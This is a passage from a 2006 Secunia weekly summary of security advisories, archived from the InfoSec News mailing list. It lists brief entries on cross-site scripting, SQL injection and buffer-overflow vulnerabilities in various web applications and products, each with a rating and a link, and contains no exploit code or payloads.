Released:    2006-04-17

rgod has reported a vulnerability in phpWebSite, which can be exploited
by malicious people to disclose sensitive information and potentially
compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/19647/

 --

[SA19645] MODx Cross-Site Scripting and Directory Traversal

Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting, Exposure of sensitive information
Released:    2006-04-18

Rusydi Hasan M has reported two vulnerabilities in MODx, which can be
exploited by malicious people to conduct cross-site scripting attacks
and disclose sensitive information.

Full Advisory:
http://secunia.com/advisories/19645/

 --

[SA19663] Novell GroupWise Messenger Accept-Language Buffer Overflow

Critical:    Moderately critical
Where:       From local network
Impact:      System access
Released:    2006-04-14

A vulnerability has been reported in Novell GroupWise Messenger, which
can be exploited by malicious people to compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/19663/

 --

[SA19725] AWStats "config" Cross-Site Scripting and Full Path
Disclosure

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting, Exposure of system information
Released:    2006-04-19

r0t has discovered a vulnerability in AWStats, which can be exploited
by malicious people to disclose system information and conduct
cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/19725/

 --

[SA19720] Plexum X5 "plexum.php" SQL Injection Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      Manipulation of data
Released:    2006-04-19

r0t has reported a vulnerability in Plexum X5, which can be exploited
by malicious users to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/19720/

 --

[SA19711] bMachine Search Feature Cross-Site Scripting

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-04-18

almokanna has reported a vulnerability in bMachine, which can be
exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/19711/

 --

[SA19710] Calendarix "ycyear" Cross-Site Scripting Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-04-18

botan has reported a vulnerability in Calendarix, which can be
exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/19710/

 --

[SA19704] ShoutBOOK Multiple Script Insertion Vulnerabilities

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-04-18

Some vulnerabilities have been discovered in ShoutBOOK, which can be
exploited by malicious people to conduct script insertion attacks.

Full Advisory:
http://secunia.com/advisories/19704/

 --

[SA19701] IntelliLink Pro Multiple Cross-Site Scripting
Vulnerabilities

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-04-19

r0t has reported some vulnerabilities in IntelliLink Pro, which can be
exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/19701/

 --

[SA19695] KCScripts Portal Pack Multiple Cross-Site Scripting
Vulnerabilities

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-04-20

r0t has reported some vulnerabilities in KCScripts Portal Pack, which
can be exploited by malicious people to conduct cross-site scripting
attacks.

Full Advisory:
http://secunia.com/advisories/19695/

 --

[SA19685] PMTool "order" SQL Injection Vulnerabilities

Critical:    Less critical
Where:       From remote
Impact:      Manipulation of data
Released:    2006-04-19

Pratiksha Doshi has discovered some vulnerabilities in PMTool, which
can be exploited by malicious users to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/19685/

 --

[SA19681] planetSearch+ "search_exp" Cross-Site Scripting
Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-04-17

d4igoro has reported a vulnerability in planetSearch+, which can be
exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/19681/

 --

[SA19679] LinPHA Cross-Site Scripting Vulnerabilities

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-04-19

d4igoro has discovered some vulnerabilities in LinPHA, which can be
exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/19679/

 --

[SA19673] Bitweaver "error" Cross-Site Scripting Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-04-17

KaDaL-X has reported a vulnerability in Bitweaver, which can be
exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/19673/

 --

[SA19660] TinyWebGallery "twg_album" Cross-Site Scripting
Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-04-17

Qex has reported a vulnerability in TinyWebGallery, which can be
exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/19660/

 --

[SA19659] phpMyAdmin "sql_query" Cross-Site Scripting and SQL Code
Execution

Critical:    Less critical
Where:       From remote
Impact:      Security Bypass, Cross Site Scripting
Released:    2006-04-17

p0w3r has discovered a vulnerability in phpMyAdmin, which can be
exploited by malicious people to conduct cross-site scripting attacks
and execute arbitrary SQL code.

Full Advisory:
http://secunia.com/advisories/19659/

 --

[SA19655] Visale Cross-Site Scripting Vulnerabilities

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-04-19

r0t has reported some vulnerabilities in Visale, which can be exploited
by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/19655/

 --

[SA19654] Boardsolution "keyword" Cross-Site Scripting Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting, Exposure of system information
Released:    2006-04-19

Qex has reported a vulnerability in Boardsolution, which can be
exploited by malicious people to disclose system information and
conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/19654/

 --

[SA19652] phpFaber TopSites "page" Cross-Site Scripting Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-04-19

botan has discovered a vulnerability in phpFaber TopSites, which can be
exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/19652/

 --

[SA19651] Net Clubs Pro Multiple Cross-Site Scripting Vulnerabilities

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-04-20

r0t has reported some vulnerabilities in Net Clubs Pro, which can be
exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/19651/

 --

[SA19648] FarsiNews "selected_search_arch" Cross-Site Scripting

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting, Exposure of system information
Released:    2006-04-19

R@1D3N has discovered a vulnerability in FarsiNews, which can be
exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/19648/

 --

[SA19646] LifeType Template "show" Cross-Site Scripting Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-04-17

cR45H3R has reported a vulnerability in LifeType, which can be
exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/19646/

 --

[SA19698] Firefox "View Image" Local Resource Linking Weakness

Critical:    Not critical
Where:       From remote
Impact:      Security Bypass
Released:    2006-04-18

Eric Foley has discovered a weakness in Firefox, which can be exploited
by malicious people to bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/19698/



========================================================================

Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third-party patches; only use
those supplied by the vendor.

Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/

Subscribe:
http://secunia.com/secunia_weekly_summary/

Contact details:
Web	: http://secunia.com/
E-mail	: support@private
Tel	: +45 70 20 51 44
Fax	: +45 70 20 51 45



_________________________________
InfoSec News v2.0 - Coming Soon! 
http://www.infosecnews.org 



This archive was generated by hypermail 2.1.3 : Fri Apr 21 2006 - 03:13:04 PDT